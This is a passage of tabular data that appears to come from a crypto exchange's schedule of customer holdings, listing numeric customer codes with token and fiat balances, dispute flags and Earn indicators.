| 07331911 | | USD[10.00] | | |
| 07331912 | | USD[0.00], USDT[9.93910686] | | |
| 07331913 | | USD[10.00] | | |
| 07331915 | | USD[10.00] | | |
| 07331916 | | USD[10.00] | | |
| 07331917 | | BRZ[1], CUSDT[3], DOGE[1], TRX[1], USD[0.00] | | |
| 07331918 | | BTC[.0418], USD[1.77], USDT[.00104812] | | |
| 07331919 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07331920 | | USD[10.00] | | |
| 07331921 | | USD[10.00] | | |
| 07331923 | | USD[0.01] | | |
| 07331924 | | USD[10.00] | | |
| 07331925 | | CUSDT[1], TRX[.08184574], USD[11.30] | Yes | |
| 07331926 | | USD[10.00] | | |
| 07331927 | | BAT[.00013313], BTC[.00000003], CUSDT[3.98], DOGE[1256.69055444], ETH[.00000001], ETHW[.00000001], SHIB[51300.71291471], SOL[0.03810170], SUSHI[.00645369], USD[6.96] | Yes | |
| 07331928 | | BTC[.00020786], USD[0.00] | | |
| 07331929 | | USD[10.00] | | |
| 07331930 | | USD[10.00] | | |
| 07331931 | | DOGE[2154.2472547], GRT[22.23265495], TRX[627.58707437], USD[0.00] | | |
| 07331932 | | USD[10.00] | | |
| 07331933 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07331934 | | USD[10.00] | | |
| 07331935 | | BAT[.83040304], CUSDT[10], DOGE[11.88135319], ETH[.00034441], ETHW[.00034441], LINK[.01587689], MKR[.00076519], SHIB[371172.12109491], TRX[50.33056719], USD[0.45], USDT[1] | | |
| 07331936 | | BRZ[4], CUSDT[9], TRX[5], USD[0.01], USDT[2.01870909] | | |
| 07331937 | | USD[10.00] | | |
| 07331938 | | DOGE[416.15281559], TRX[1], USD[0.00] | Yes | |
| 07331939 | | BTC[.00015955], USD[0.00] | | |
| 07331940 | | USD[10.00] | | |
| 07331941 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07331942 | | MATIC[9.49692439], USD[0.00] | Yes | |
| 07331943 | | BAT[0], BRZ[1], CUSDT[3], DOGE[1047.01326017], ETH[0], GRT[0.00008706], SHIB[3659459.07543858], SOL[0.20256337], TRX[12.26840641], USD[70.62], USDT[0] | Yes | |
| 07331944 | | USD[10.00] | | |
| 07331945 | | USD[10.00] | | |
| 07331946 | | USD[10.00] | | |
| 07331947 | | BTC[.00004461], USD[10.00] | | |
| 07331948 | | USD[10.00] | | |
| 07331949 | | BAT[1.01554407], CUSDT[11], DOGE[3], GRT[1.00159943], SHIB[7092015.16231578], TRX[1], USD[0.00] | Yes | |
| 07331950 | | USD[0.00] | | |
| 07331951 | | USD[0.01] | | |
| 07331952 | | USD[10.00] | | |
| 07331953 | | BRZ[1], BTC[0], TRX[1], USD[0.00] | Yes | |
| 07331954 | | USD[10.00] | | |
| 07331955 | | DOGE[24.08474593], USD[0.00] | | |
| 07331956 | | USD[10.00] | | |
| 07331957 | | BTC[.0005188], CUSDT[2], TRX[1], USD[0.01] | | |
| 07331958 | | DOGE[1676.79275471], GRT[8.79184327], USD[0.00] | | |
| 07331959 | | DOGE[3.43995], TRX[29.886], USD[7.74] | | |
| 07331960 | | BRZ[1], TRX[1], USD[0.42] | | |
| 07331961 | | USD[10.00] | | |
| 07331962 | | USD[10.00] | | |
| 07331963 | | USD[10.00] | | |
| 07331964 | | USD[0.52] | | |
| 07331965 | | BF_POINT[100], DOGE[457.89508992], ETH[.00001715], ETHW[.0001715], SHIB[1107038.48450778], TRX[2], USD[0.05] | Yes | |
| 07331966 | | BTC[0], CUSDT[1], DOGE[2], USD[0.00] | | |
| 07331967 | | BAT[41.43546389], BRZ[141.93801499], CUSDT[2005.98661885], DOGE[10041.35294972], TRX[310.87739624], USD[0.00] | | |
| 07331968 | | USD[10.00] | | |
| 07331969 | | BRZ[2], CUSDT[6], DOGE[208.97063967], TRX[4], USD[0.01] | | |
| 07331970 | | BAT[1], BRZ[1], CUSDT[3], DOGE[1], USD[0.01] | | |
| 07331971 | | CUSDT[3], DOGE[3.00002288], GRT[28.7314979], SUSHI[.00008401], TRX[.00000704], USD[0.01] | | |
| 07331972 | | USD[11.03] | Yes | |
| 07331973 | Contingent, Disputed | BTC[0], DOGE[13.78705572], ETH[0], GBP[0.00], TRX[1], USD[0.00], USDT[0.00000001] | Yes | |
| 07331974 | | USD[10.00] | | |
| 07331975 | | USD[10.00] | | |
| 07331976 | | BRZ[5], CUSDT[6], DOGE[8877.44367377], GRT[1], TRX[15], USD[0.00], USDT[1] | | |
| 07331977 | | BTC[0], CUSDT[2], DOGE[0], GBP[0.00], TRX[0], UNI[0], USD[0.00] | Yes | |
| 07331978 | | DOGE[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07331979 | | USD[10.00] | | |
| 07331980 | | USD[10.00] | | |
| 07331981 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07331982 | | DOGE[178.36067632], USD[0.00] | | |
| 07331983 | | DOGE[12.41728499], TRX[166.25746328], USD[0.00] | | |
| 07331984 | | USD[10.00] | | |
| 07331986 | | USD[10.00] | | |
| 07331988 | | USD[0.65] | Yes | |
| 07331989 | Contingent, Disputed | BCH[.00038506], DOGE[26.19113542], USD[0.05] | | |
| 07331990 | | SHIB[1], USD[496.07] | | |
| 07331991 | | DOGE[1442.87826155], USD[0.00] | | |
| 07331992 | | BAT[2], BRZ[3], CUSDT[4], GRT[4], LINK[1], TRX[8], USD[3.98], USDT[2.29896484] | | |
| 07331993 | | USD[10.00] | | |
| 07331994 | | USD[10.00] | | |
| 07331995 | | USD[10.00] | | |
| 07331996 | | USD[10.00] | | |
| 07331997 | | CUSDT[1], GRT[1], USD[0.00], USDT[0.00000001] | | |
| 07331999 | | USD[10.00] | | |
| 07332000 | Contingent, Disputed | CUSDT[5527.40204245], DAI[.00103649], TRX[1], USD[-16.00], USDT[0] | Yes | |
| 07332001 | | USD[10.00] | | |
| 07332002 | | USD[0.00] | | |
| 07332003 | | CUSDT[2], SHIB[1976704.31594708], USD[0.00] | | |
| 07332004 | | CUSDT[1054.57346662], SHIB[1], USD[0.01] | | |
| 07332005 | | USD[0.99] | | |
| 07332007 | | CUSDT[1], DOGE[0], ETH[0], GRT[0], MATIC[0], USD[0.00] | Yes | |
| 07332008 | | BAT[1.01614718], BRZ[1], CUSDT[1], DOGE[0], MATIC[0], SUSHI[1.08255477], TRX[3], USD[0.00], USDT[1.09754643] | Yes | |
| 07332009 | | BRZ[1], DOGE[2], TRX[1], USD[0.00] | | |
| 07332010 | | USD[0.00] | | |
| 07332011 | | BTC[.00003077], CUSDT[463.76476804], DOGE[3515.06912074], KSHIB[266.57944187], MATIC[3.13167781], TRX[2], USD[0.00] | Yes | |
| 07332012 | | SHIB[211.64129735], USD[0.00], USDT[0] | Yes | |
| 07332013 | | CUSDT[1], USD[0.00] | Yes | |
| 07332014 | | BAT[68.61312574], BRZ[1], DOGE[0], ETH[0], ETHW[0], GRT[0], LTC[0], MATIC[54.26593698], SUSHI[10.86437553], TRX[1], USD[504.00], USDT[0.00000001] | Yes | |
| 07332015 | | USD[10.37] | Yes | |
| 07332017 | | BAT[1.00935354], BCH[.10438698], BRZ[10.83748842], BTC[.37521469], CUSDT[530.29727769], DOGE[14029.83800771], ETH[.21831585], ETHW[.21810428], GRT[109.16075687], LINK[1.3941693], MATIC[50.39919414], SHIB[2246291.43311728], SOL[5.0921887], SUSHI[12.16571036], TRX[1247.49478636], USD[2245.73], USDT[1.02411273] | Yes | |
| 07332018 | | USD[10.00] | | |
| 07332019 | | USD[10.00] | | |
| 07332020 | | USD[10.00] | | |
| 07332022 | | USD[0.00], USDT[10.00334224] | | |
| 07332024 | | USD[10.00] | | |
| 07332026 | | USD[10.00] | | |
| 07332027 | | USD[10.00] | | |
| 07332028 | | USD[11.09] | Yes | |
| 07332029 | | USD[0.02] | | |
| 07332030 | | TRX[1], USD[0.00] | Yes | |
| 07332031 | | USD[10.00] | | |
| 07332032 | | USD[0.01] | | |
| 07332033 | | SOL[.24736018], USD[0.00] | Yes | |
| 07332035 | | USD[10.00] | | |
| 07332036 | | USD[0.00] | | |
| 07332037 | | USD[10.00] | | |
| 07332039 | | BRZ[14], BTC[0], CUSDT[31], DOGE[8], MATIC[0], SUSHI[1], TRX[567.55486717], USD[0.02], USDT[7] | | |
| 07332040 | | BTC[0.10884061], USD[77.63] | | |
| 07332041 | | BTC[.01246051], ETH[.90035324], ETHW[.90035324], USD[6114.97] | | |
| 07332042 | | BTC[.0001737], USD[0.00] | | |
| 07332043 | | USD[10.00] | | |
| 07332044 | | USD[10.00] | | |
| 07332045 | | DOGE[1290.53414254], TRX[1], USD[10.00] | | |
| 07332046 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07332047 | | TRX[170.65134718], USD[0.00] | | |
| 07332048 | | BTC[.00072414], CUSDT[2], DOGE[250.96729350], ETH[.02154839], ETHW[.02154839], SOL[0.65685527], TRX[302.10357874], USD[0.01] | | |
| 07332049 | | BCH[0], CUSDT[0], DOGE[0], MKR[0], SHIB[1], USD[394.85], USDT[0] | Yes | |
| 07332050 | | USD[10.00] | | |
| 07332051 | | BRZ[1], CUSDT[10], DOGE[1], SHIB[46227828.89002143], TRX[3], USD[0.74] | Yes | |
| 07332052 | | DOGE[1], USD[7.84] | | |
| 07332053 | | BAT[0.00040698], BRZ[1], BTC[0], CAD[0.00], DOGE[1], ETH[0], GRT[0], SOL[0], USD[0.00] | | |
| 07332054 | | BCH[0], CUSDT[1], DOGE[0], SHIB[415637.66737461], USD[0.00] | Yes | |
| 07332055 | | CUSDT[5], DOGE[1237.46740625], USD[0.00] | | |
| 07332056 | | USD[10.00] | | |
| 07332057 | | USD[10.00] | | |
| 07332058 | | USD[0.00], USDT[0] | | |
| 07332059 | | DOGE[114.30995149], SOL[3.13931401], SUSHI[2.00000694], TRX[213.24572961], USD[0.00] | | |
| 07332060 | | USD[0.00] | | |
| 07332061 | | USD[10.00] | | |
| 07332062 | | CUSDT[4], DOGE[1.00015319], SHIB[1], TRX[1], USD[57.89] | | |
| 07332063 | | USD[0.00] | | |
| 07332064 | | CUSDT[1], DOGE[201.99520025], GRT[1], TRX[1.72902404], USD[0.00], USDT[1] | | |
| 07332066 | | BAT[0], BCH[0.00545907], BTC[0], DOGE[0.05598139], ETH[0.00070008], ETHW[0.00069609], LINK[.23348582], LTC[0.00481774], SUSHI[0], TRX[0.29036477], UNI[0.34325881], USD[-2.64], USDT[0] | Yes | |
| 07332068 | | USD[10.00] | | |
| 07332069 | | BAT[2], BRZ[1], CUSDT[4], DOGE[1], TRX[10], USD[0.00], USDT[0] | | |
| 07332070 | | CUSDT[2], DOGE[1.0000713], TRX[4], USD[0.00] | | |
| 07332071 | | BAT[3.97446686], BRZ[.0001655], BTC[.00204495], CUSDT[20.00046787], DAI[.00015034], DOGE[4342.74181438], ETH[.03566787], ETHW[.03566787], LTC[.30581988], TRX[2.00004128], USD[0.00] | | |
| 07332072 | | CUSDT[2], DOGE[2462.45482996], USD[421.75] | | |
| 07332073 | | CUSDT[3], DOGE[7920.67764808], TRX[3], USD[0.00] | | |
| 07332074 | | USD[10.00] | | |
| 07332075 | | BTC[.00020816], USD[0.00] | | |
| 07332076 | | USD[11.08] | Yes | |
| 07332077 | | DOGE[1], DOGE[5870.79140672], USD[10.00] | | |
| 07332078 | | USD[10.00] | | |
| 07332079 | | USD[10.00] | | |
| 07332080 | | BRZ[2], CUSDT[66.71324553], LINK[.28301886], MATIC[6.28876937], TRX[.00100211], USD[11.55] | Yes | |
| 07332081 | | CUSDT[3], DOGE[337.68937876], TRX[1], USD[0.00] | | |
| 07332082 | | DOGE[62.52862827], USD[0.15] | Yes | |
| 07332083 | | DOGE[7001.03514515], USD[0.00] | | |
| 07332084 | | USD[0.01] | | |
| 07332086 | | USD[10.00] | | |
| 07332087 | | BCH[0], BTC[0], CUSDT[3.49697378], DOGE[0.42435983], LTC[0], UNI[0], USD[0.00], USDT[0] | | |
| 07332088 | | USD[10.00] | | |
| 07332089 | | USD[10.00] | | |
| 07332090 | | USD[10.81] | Yes | |
| 07332091 | | BTC[.00006564], LINK[.8964], LTC[.05976], UNI[1.3944], USD[3.50], YFI[.000996] | | |
| 07332092 | | GRT[4.59993944], USD[0.00] | | |
| 07332093 | | USD[10.00] | | |
| 07332094 | | DOGE[241.68497558], USD[0.00] | | |
| 07332095 | | USD[10.00] | | |
| 07332097 | | USD[10.00] | | |
| 07332098 | Contingent, Disputed | DOGE[.00000522], USD[0.00] | | |
| 07332100 | | MATIC[8.992], USD[0.74] | | |
| 07332101 | | CUSDT[3], DOGE[1], USD[0.01] | | |
| 07332102 | | USD[10.00] | | |
| 07332104 | | CUSDT[1], USD[0.00] | | |
| 07332105 | | USD[10.00] | | |
| 07332106 | | CUSDT[1], DOGE[44.09570205], USD[0.00] | Yes | |
| 07332107 | | USD[10.00] | | |
| 07332108 | | USD[10.00] | | |
| 07332109 | | CUSDT[187.23527172], TRX[1], USD[0.00] | | |
| 07332110 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07332111 | | BRZ[1], CUSDT[12], DOGE[.75325773], TRX[1], USD[0.35] | | |
| 07332112 | | DOGE[0], USD[0.00], USDT[.00005617] | | |
| 07332114 | | USD[0.00] | | |
| 07332115 | | USD[0.00] | | |
| 07332116 | | BTC[0.00370963], CUSDT[17.24964101], ETH[.0061909], ETHW[.00610882], SHIB[786579.07593194], USD[0.00] | Yes | |
| 07332117 | | CUSDT[3], DOGE[5], TRX[1], USD[0.00] | | |
| 07332118 | | BAT[8.06373974], BRZ[1], BTC[0], CUSDT[8], DOGE[5.78196296], GRT[4.3831019], SUSHI[0.80847790], TRX[2], UNI[.37367462], USD[0.00] | | |
| 07332119 | | USD[0.00] | | |
| 07332120 | | CUSDT[1], TRX[1], USD[0.62] | Yes | |
| 07332123 | | DOGE[1], USD[0.01] | | |
| 07332124 | | USD[0.00] | | |
| 07332125 | | CUSDT[1], DOGE[28.80493176], USD[0.00] | | |
| 07332126 | | BRZ[1], DOGE[2], LINK[1.18397442], LTC[.08107223], SUSHI[.5977684], TRX[1782.1061655], UNI[.00001047], USD[0.00], YFI[.0022527] | Yes | |
| 07332127 | | DOGE[3014.39433773], TRX[172.33894451], USD[0.00] | | |
| 07332128 | | GRT[2], USD[0.00] | | |
| 07332129 | | USD[0.00] | | |
| 07332131 | | USD[0.00] | | |
| 07332132 | | BTC[.00137716], CUSDT[1], DOGE[.00029668], TRX[2], USD[0.80] | | |
| 07332133 | | DOGE[134.9518195], USD[0.00] | | |
| 07332134 | | USD[0.00] | | |
| 07332135 | | BF_POINT[300], BTC[.00131497], DOGE[64.81345186], ETH[.04841234], ETHW[.04841234], TRX[3], USD[0.00] | | |
| 07332136 | | BTC[.00004407], USD[0.00] | Yes | |
| 07332137 | | USD[0.00] | | |
| 07332138 | | BTC[.00025626], USD[0.00] | | |
| 07332140 | | DOGE[0], TRX[1], USD[0.01] | | |
| 07332141 | | ETH[.00533229], ETHW[.00533229], USD[0.00] | | |
| 07332142 | | BAT[1], DOGE[2046.76717938], LINK[1], USD[0.00] | | |
| 07332143 | | USD[0.00], USDT[0] | Yes | |
| 07332144 | | CUSDT[2], TRX[2], USD[0.00] | | |
| 07332145 | | USD[0.00] | | |
| 07332146 | | BRZ[0], BTC[0], CUSDT[4], DOGE[2049.52431332], ETH[0.00814716], ETHW[0.00814716], SOL[0], TRX[0], USD[0.00], USDT[0] | | |
| 07332148 | | DOGE[621.65337989], USD[0.00] | | |
| 07332149 | | TRX[1], USD[0.01] | | |
| 07332150 | | USD[0.00] | | |
| 07332151 | | CUSDT[1], DOGE[14077.18884712], TRX[1], USD[0.00] | Yes | |
| 07332152 | | USD[0.00] | | |
| 07332153 | | BCH[.00534279], BTC[.00007902], CAD[3.86], DOGE[41.10094647], ETH[.00130339], ETHW[.00128971], LTC[.01593112], USD[0.00] | Yes | |
| 07332154 | | USD[0.00] | | |
| 07332155 | | DOGE[137.68215223], USD[0.00] | | |
| 07332156 | | DOGE[221.15593857], USD[0.00] | | |
| 07332157 | | USD[0.00] | | |
| 07332158 | | BRZ[3], CUSDT[1], TRX[2], USD[0.01], USDT[1] | | |
| 07332159 | | USD[0.00] | | |
| 07332160 | | USD[0.00] | | |
| 07332161 | | BRZ[1], DOGE[2306.35203437], SOL[.47325272], TRX[1], USD[2.83] | Yes | |
| 07332162 | | CUSDT[1], ETHW[.03862002], SHIB[2], TRX[1], USD[78.60] | | |
| 07332163 | | BAT[1], BRZ[1], CUSDT[5], GRT[1], TRX[7], USD[0.01], USDT[1] | | |
| 07332165 | | USD[0.00] | | |
| 07332166 | | USD[0.00] | | |
| 07332167 | | BAT[0], BTC[0], CUSDT[3], DOGE[13942.60083272], ETH[0.00000059], ETHW[0.00000059], SOL[0], SUSHI[0], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07332168 | | USD[0.00] | | |
| 07332169 | | USD[0.01] | | |
| 07332170 | | USD[0.00] | | |
| 07332171 | | USD[0.00] | | |
| 07332172 | | CUSDT[3], USD[0.00] | Yes | |
| 07332173 | | BTC[0], CUSDT[2], DOGE[1], TRX[3], USD[0.00] | Yes | |
| 07332174 | | USD[0.00] | | |
| 07332175 | | USD[13.78], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07332176 | | BRZ[1], CUSDT[2], DOGE[1402.79036015], USD[0.00] | | |
| 07332177 | | USD[10.00] | | |
| 07332178 | | USD[10.00] | | |
| 07332179 | | USD[10.00] | | |
| 07332180 | | USD[0.44] | Yes | |
| 07332181 | | GRT[10.06775903], TRX[1], USD[0.00] | | |
| 07332182 | | CUSDT[2], DOGE[3], GRT[1], TRX[3], USD[0.01] | | |
| 07332183 | | BTC[.00020048], USD[0.00] | | |
| 07332184 | | CUSDT[62], DOGE[.00075211], TRX[5], USD[0.03] | | |
| 07332185 | | DOGE[1], USD[0.00] | | |
| 07332186 | | USD[10.00] | | |
| 07332187 | | CUSDT[7], DOGE[2], GRT[1], USD[0.01] | | |
| 07332188 | | USD[10.00] | | |
| 07332189 | | USD[0.00] | Yes | |
| 07332192 | | BTC[.00005178], SOL[3.93], USD[0.28], USDT[0] | | |
| 07332193 | | USD[10.00] | | |
| 07332194 | | USD[0.01] | | |
| 07332195 | | CUSDT[8], SHIB[1], TRX[1.09368541], USD[0.73], USDT[0] | Yes | |
| 07332196 | | DOGE[0], ETH[0], ETHW[0], USD[0.00] | | |
| 07332199 | | USD[10.00] | | |
| 07332200 | | CUSDT[468.39197288], USD[0.00] | | |
| 07332201 | | DOGE[14.9603605], USD[0.00] | | |
| 07332202 | | DOGE[1], TRX[1], USD[0.01], USDT[1.07324272] | Yes | |
| 07332203 | | BRZ[1], CUSDT[4], DOGE[2], TRX[1], USD[0.00] | | |
| 07332204 | | CUSDT[3], ETH[.25061615], ETHW[.25042379], SHIB[16517986.54722080], SOL[0], USD[0.00] | Yes | |
| 07332205 | | BTC[0], DOGE[0] | | |
| 07332206 | | USD[10.00] | | |
| 07332207 | | BAT[2], CUSDT[1], DOGE[1], MATIC[139.34074965], SHIB[7606636.02766798], USD[0.00], USDT[1] | | |
| 07332208 | | CUSDT[1], DOGE[43.34592951], SHIB[137427.27696278], USD[0.00] | | |
| 07332209 | | BRZ[1], CUSDT[2], DOGE[2352.12825336], ETH[.05870055], ETHW[.05797333], TRX[1], USD[0.00] | Yes | |
| 07332210 | | USD[10.00] | | |
| 07332211 | | USD[0.01] | Yes | |
| 07332212 | | DOGE[105.68109365], USD[0.00] | | |
| 07332213 | | USD[10.00] | | |
| 07332214 | | USD[0.01] | | |
| 07332215 | | TRX[2], USD[0.00] | | |
| 07332216 | | BTC[0], DOGE[10498.12742008], ETH[0], SHIB[5242681.52527945], SOL[.11462256], USD[0.02] | Yes | |
| 07332217 | | CUSDT[1], DOGE[453.43569694], USD[30.64] | | |
| 07332218 | | BRZ[25.22341132], CUSDT[1], DOGE[70.16681177], TRX[92.55399414], USD[15.00], USDT[29.54463797] | | |
| 07332219 | | CUSDT[1], GRT[2], USD[0.00], USDT[1] | | |
| 07332220 | | DOGE[.77961679], USD[0.31] | | |
| 07332221 | | USD[0.01], USDT[0] | | |
| 07332222 | | USD[10.00] | | |
| 07332223 | | TRX[1], USD[0.01] | | |
| 07332224 | | BTC[.00046816], DOGE[98.67094420], ETH[.007992], ETHW[.007992], GRT[2.997], LTC[0], SOL[.006], SUSHI[0], UNI[0], USD[1.70] | | |
| 07332225 | | USD[10.00] | | |
| 07332226 | | USD[10.00] | | |
| 07332227 | | USD[0.00] | Yes | |
| 07332228 | | USD[10.00] | | |
| 07332229 | | USD[10.00] | | |
| 07332230 | | BTC[.00082627], TRX[0], USD[0.02] | Yes | |
| 07332231 | | USD[10.00] | | |
| 07332232 | | DOGE[842.54330541], USD[0.00] | | |
| 07332234 | | CUSDT[32.10584091], TRX[1], USD[0.15] | Yes | |
| 07332235 | | USD[10.00] | | |
| 07332236 | | USD[10.00] | | |
| 07332237 | | CUSDT[1], USD[0.00] | | |
| 07332238 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07332239 | | CUSDT[4], DOGE[561.70775254], USD[0.00] | | |
| 07332240 | | USD[10.00] | | |
| 07332241 | | BCH[5.33695304], TRX[1], USD[0.00] | Yes | |
| 07332242 | | BAT[1.0165555], BRZ[1], CUSDT[4], LTC[.00382824], SHIB[4], USD[0.00], USDT[.99438061] | Yes | |
| 07332244 | | GRT[5.47594253], USD[0.00] | | |
| 07332245 | | ALGO[59], BAT[0], DOGE[2589.43468276], ETH[0], KSHIB[7.13], SHIB[9657510.60292503], SUSHI[0], TRX[0], USD[0.09] | | |
| 07332246 | | USD[10.00] | | |
| 07332247 | | CUSDT[5], TRX[1], USD[45.24] | Yes | |
| 07332248 | | BRZ[1], DOGE[8047.22168777], KSHIB[688.36602899], USD[0.00] | | |
| 07332249 | | CUSDT[3], USD[0.00] | | |
| 07332250 | | CUSDT[6], SHIB[2], SOL[0], USD[0.00] | Yes | |
| 07332251 | | USD[10.00] | | |
| 07332252 | | USD[10.00] | | |
| 07332253 | | USD[10.00] | | |
| 07332254 | | DOGE[0], ETH[0], LINK[0], NFT (421856648472264055/Astral Apes #1812)[1], NFT (429817607652781832/ALPHA:RONIN #394)[1], NFT (490418137785065844/ALPHA:RONIN #750)[1], SOL[0.001404470], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07332255 | | USD[10.00] | | |
| 07332256 | | USD[10.00] | | |
| 07332257 | | USD[10.00] | | |
| 07332258 | | USD[10.00] | | |
| 07332259 | | USD[10.00] | | |
| 07332260 | | BRZ[2], GRT[1], TRX[5], USD[49.79] | | |
| 07332261 | | DOGE[70.64356998], TRX[87.57338868], USD[0.00] | | |
| 07332262 | | USD[10.00] | | |
| 07332263 | | USD[10.00] | | |
| 07332264 | | USD[10.00] | | |
| 07332265 | | TRX[1], USD[0.00] | | |
| 07332266 | | USD[10.00] | | |
| 07332267 | | USD[0.01], USDT[0.00000001] | | |
| 07332268 | | CUSDT[1], DOGE[514.27087257], TRX[1], USD[0.00] | | |
| 07332269 | | BAT[1.01655549], BRZ[3], CUSDT[9], TRX[1], USD[0.00] | Yes | |
| 07332271 | | BRZ[3], CUSDT[5], SHIB[1], TRX[1], USD[0.01] | Yes | |
| 07332272 | | USD[10.00] | | |
| 07332273 | | USD[0.01] | Yes | |
| 07332274 | | BTC[0], DOGE[0], USD[10.00] | | |
| 07332275 | | BTC[.00662519], CUSDT[3], DOGE[2], ETH[0.39084610], ETHW[0.39084610], LINK[1.79858372], TRX[3], USD[0.21] | | |
| 07332277 | | USD[0.01] | | |
| 07332278 | | USD[10.00] | | |
| 07332279 | | USD[0.00] | Yes | |
| 07332281 | | BRZ[1], SHIB[428138.92865463], USD[93.53] | Yes | |
| 07332282 | | USD[10.00] | | |
| 07332283 | | CUSDT[28], DOGE[0], TRX[3.12715119], USD[1.07], USDT[0.39109964] | | |
| 07332285 | | BRZ[1], CUSDT[9], DOGE[2975.51970263], TRX[127.23577725], USD[0.00] | | |
| 07332286 | | USD[10.00] | | |
| 07332287 | | BRZ[1], CUSDT[3], USD[0.00] | | |
| 07332288 | | DOGE[1], USD[0.00] | | |
| 07332289 | | BTC[0], CUSDT[1], DOGE[0], ETH[0], SHIB[1], SUSHI[0], USD[0.00], USDT[0] | | |
| 07332290 | | USD[10.00] | | |
| 07332291 | | BRZ[2], BTC[0], CUSDT[2], DOGE[1], TRX[3], USD[1882.61] | | |
| 07332292 | | BAT[0], BRZ[1], BTC[0], CUSDT[2], DOGE[0.62100640], SOL[0], TRX[2], USD[0.74], USDT[3] | | |
| 07332293 | | USD[10.00] | | |
| 07332294 | | BRZ[0.00289403], BTC[0], CUSDT[2], DOGE[1], ETH[0], GRT[0], TRX[270.8400941], USD[0.00] | | |
| 07332295 | | CUSDT[4], ETH[.00000001], ETHW[0], KSHIB[415.54184129], TRX[1], USD[0.00] | Yes | |
| 07332296 | | USD[10.00] | | |
| 07332297 | | BAT[59.61640183], BRZ[1], CUSDT[2], DOGE[1735.24921680], SHIB[1], SOL[6.44620168], SUSHI[1.01435959], TRX[1], USD[0.00] | | |
| 07332298 | | USD[10.00] | | |
| 07332299 | | BRZ[94076057], CUSDT[4.09954987], DOGE[.73765624], TRX[.66948781], USD[4.90] | Yes | |
| 07332300 | | CUSDT[3], DOGE[4], LINK[0.00027299], SUSHI[.97109352], UNI[0], USD[0.00] | | |
| 07332301 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07332302 | | CUSDT[1], DOGE[1.53341363], TRX[182.62498387], USD[17.56] | | |
| 07332303 | | USD[10.00] | | |
| 07332304 | | CUSDT[1], DOGE[.22105852], TRX[1], USD[0.14] | Yes | |
| 07332305 | | USD[10.00] | | |
| 07332306 | | USD[10.00] | | |
| 07332307 | | USD[10.00] | | |
| 07332308 | | USD[10.00] | | |
| 07332309 | | USD[10.00] | | |
| 07332310 | | USD[10.00] | | |
| 07332311 | | BCH[.02248587], BTC[0], CUSDT[2], TRX[.01353867], USD[0.01] | Yes | |
| 07332312 | | USD[10.00] | | |
| 07332313 | | USD[10.00] | | |
| 07332314 | | USD[10.00] | | |
| 07332315 | | BRZ[3], CUSDT[.0006542], DOGE[1.27036139], ETH[.0000178], ETHW[.0000178], TRX[3.00058481], USD[0.00] | | |
| 07332316 | | USD[10.00] | | |
| 07332317 | | BRZ[1], DOGE[1], GRT[0], TRX[1], USD[0.00] | | |
| 07332318 | | DOGE[36.44890922], TRX[1], USD[26.00] | | |
| 07332319 | | CUSDT[3], DOGE[233.25999506], TRX[73.53660191], USD[0.00] | Yes | |
| 07332320 | | DOGE[939.94567642], USD[0.00] | Yes | |
| 07332321 | | CUSDT[2], DOGE[.00007108], TRX[2], USD[0.00] | Yes | |
| 07332322 | | DOGE[0], USD[10.00] | | |
| 07332323 | | DOGE[1], USD[96.71] | | |
| 07332324 | | ETH[.00000014], ETHW[.00000014], USD[0.00] | | |
| 07332325 | | BRZ[1], BTC[0], CUSDT[1], DOGE[2], ETH[0], GRT[0], LINK[0], SOL[0.00003079], TRX[3], USD[0.00], USDT[1.07627555] | Yes | |
| 07332326 | | USD[10.00] | | |
| 07332327 | | USD[10.00] | | |
| 07332328 | | BAT[0], BRZ[5], CAD[29.76], CUSDT[11], DOGE[80.14023255], ETH[0], EUR[40.47], LTC[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07332329 | | USD[10.00] | | |
| 07332330 | | USD[0.00] | | |
| 07332331 | | BTC[.00229289], USD[0.00] | | |
| 07332332 | | BTC[.00010094], DOGE[20.39838095], USD[0.00] | | |
| 07332333 | | CUSDT[1], DOGE[873.36587], USD[0.00] | | |
| 07332334 | | USD[10.00] | | |
| 07332335 | | BTC[0], DOGE[5.22073526], USD[0.00] | | |
| 07332336 | | USD[10.00] | | |
| 07332337 | | BRZ[1], BTC[0], CUSDT[296.24780851], DOGE[0], ETH[0], GRT[0], TRX[1], USD[0.00] | Yes | |
| 07332338 | | USD[10.00] | | |
| 07332339 | | BRZ[1], CUSDT[7], DOGE[373.62904280], ETH[0.09898606], ETHW[0.09795520], GRT[1.00367791], LINK[1.10695671], USD[0.00] | Yes | |
| 07332340 | | USD[10.00] | | |
| 07332341 | | USD[10.00] | | |
| 07332343 | | BCH[.12772099], BTC[.00288589], CUSDT[11], DOGE[137.3186478], ETH[.03885287], ETHW[.03885287], LTC[0.24449248], TRX[667.54276286], USD[62.00] | | |
| 07332344 | | USD[10.00] | | |
| 07332346 | | CUSDT[1], DOGE[0], USD[1.18] | Yes | |
| 07332347 | | USD[10.00] | | |
| 07332348 | | USD[10.00] | | |
| 07332349 | | USD[10.00] | | |
